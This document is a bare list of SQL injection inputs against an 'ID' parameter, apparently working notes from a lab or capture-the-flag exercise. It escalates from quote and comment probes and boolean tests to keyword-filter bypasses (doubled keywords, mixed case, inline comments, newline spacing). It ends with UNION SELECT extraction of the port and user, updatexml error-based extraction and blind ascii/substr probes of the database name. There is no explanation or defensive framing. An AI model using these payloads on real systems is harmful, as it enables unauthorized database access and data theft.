ID:1
ID:1'
ID:1"
ID:1' AND 1=1 -- 
ID:1 AND 1=1 -- 
ID:1 AND 1=0 -- 
ID:1" AND 1=0 -- 
ID:1" AND 1=1 -- 
ID:1' AND 1=1 -- 
ID:1') AND 1=1 -- 
ID:1\
ID:1')
ID:1') -- 
ID:1 -- 
ID:1 AND 1 -- 
ID:1 AND 0 -- 
ID:1') AND 0 -- 
ID:1') AND 1 -- 
ID:1') AND 1 -- 
ID:1')
AND
1
 -- 
ID:1')
AND
1
#
ID:1') #
ID:1') #
ID:1') #
ID:99') 
uniunionon
  selSelectect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
 SeLect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
all
 SeLect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
all
 SeLect
 1,user(),3
OR ('1
ID:1
ID:1'
ID:1'||"1
ID:1'||'1
ID:1'|| ||'1
ID:1'||updatexml(1,concat(0x7e,(database()),0x7e),1) ||'1
ID:1'||ascii(substr((length(database())),1,1))>50||'1
ID:1'&&ascii(substr((length(database())),1,1))>50&&'1
ID:1'&&ascii(substr((length(database())),1,1))<50&&'1
ID:1'&&ascii(substr((/*!select*/group_concat(database())),1,1))>100&&'1
ID:group_concat(database())),1,1))>100&&'1
ID:1'&&ascii(substr((selselectect()group_concat(database())),1,1))>100&&'1
ID:1'&&ascii(substr((select()group_concat(database())),1,1))>100&&'1
